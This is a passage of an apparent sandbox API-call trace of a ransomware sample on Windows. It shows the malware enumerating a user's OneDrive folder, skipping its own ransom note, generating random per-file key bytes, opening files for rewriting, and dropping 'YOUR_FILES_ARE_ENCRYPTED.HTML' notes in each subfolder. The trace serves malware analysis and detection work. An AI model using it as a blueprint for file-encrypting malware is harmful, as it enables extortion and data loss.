lpOverlapped=0x744a1c0) returned 1 [0160.033] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e6ab10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e6ab10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e6ab10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x27f2, dwReserved0=0x0, dwReserved1=0x60, cFileName="AutoPlayOptIn.png", cAlternateFileName="AUTOPL~2.PNG")) returned 1 [0160.033] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png") returned 89 [0160.033] lstrcmpW (lpString1="AutoPlayOptIn.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.033] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0160.033] lstrlenW (lpString=".png") returned 4 [0160.033] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0160.033] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\autoplayoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0160.034] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10226) returned 1 [0160.034] GetProcessHeap () returned 0x270000 [0160.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0160.037] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="E2") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="11") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="B8") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DF") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="81") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="BC") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="15") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="18") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="F9") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="C9") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="05") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="54") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6F") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="21") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="6E") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="CD") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="AF") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="71") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="44") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="61") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="BF") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="02") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="77") returned 2 [0160.037] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="F6") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="5E") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="FA") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="14") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="15") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="22") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="C0") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="30") returned 2 [0160.038] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0B") returned 2 [0160.038] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.png" [0160.038] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.038] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0160.039] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="az-latn-az", cAlternateFileName="AZ-LAT~1")) returned 1 [0160.039] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az") returned 82 [0160.039] GetProcessHeap () returned 0x270000 [0160.039] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.039] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az" [0160.039] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\*" [0160.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.040] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.040] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.040] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\FileSync.LocalizedResources.dll.mui") returned 118 [0160.040] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.040] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.041] lstrlenW (lpString=".mui") returned 4 [0160.041] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.041] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa658b4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa658b4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.041] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.041] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0160.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\az-latn-az\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\az-latn-az\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0160.041] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.044] CloseHandle (hObject=0x5b0) returned 1 [0160.045] GetProcessHeap () returned 0x270000 [0160.046] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.046] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="be", cAlternateFileName="")) returned 1 [0160.046] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be") returned 74 [0160.046] GetProcessHeap () returned 0x270000 [0160.046] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.046] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be" [0160.047] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\*" [0160.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.050] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa658b4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.050] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.050] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.050] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.050] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.050] lstrlenW (lpString=".mui") returned 4 [0160.050] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.050] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6754530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6754530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.050] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.051] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\be\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\be\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.255] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.258] CloseHandle (hObject=0x5a8) returned 1 [0160.258] GetProcessHeap () returned 0x270000 [0160.260] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.266] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bg", cAlternateFileName="")) returned 1 [0160.266] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg") returned 74 [0160.266] GetProcessHeap () returned 0x270000 [0160.266] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.267] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg" [0160.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\*" [0160.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.268] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6754530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.269] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.269] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.269] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.269] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.269] lstrlenW (lpString=".mui") returned 4 [0160.269] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.269] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa691d5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa691d5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.269] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.270] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bg\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bg\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.270] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.291] CloseHandle (hObject=0x5a8) returned 1 [0160.292] GetProcessHeap () returned 0x270000 [0160.293] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.293] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bn-bd", cAlternateFileName="")) returned 1 [0160.293] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd") returned 77 [0160.293] GetProcessHeap () returned 0x270000 [0160.293] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.293] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd" [0160.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\*" [0160.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", 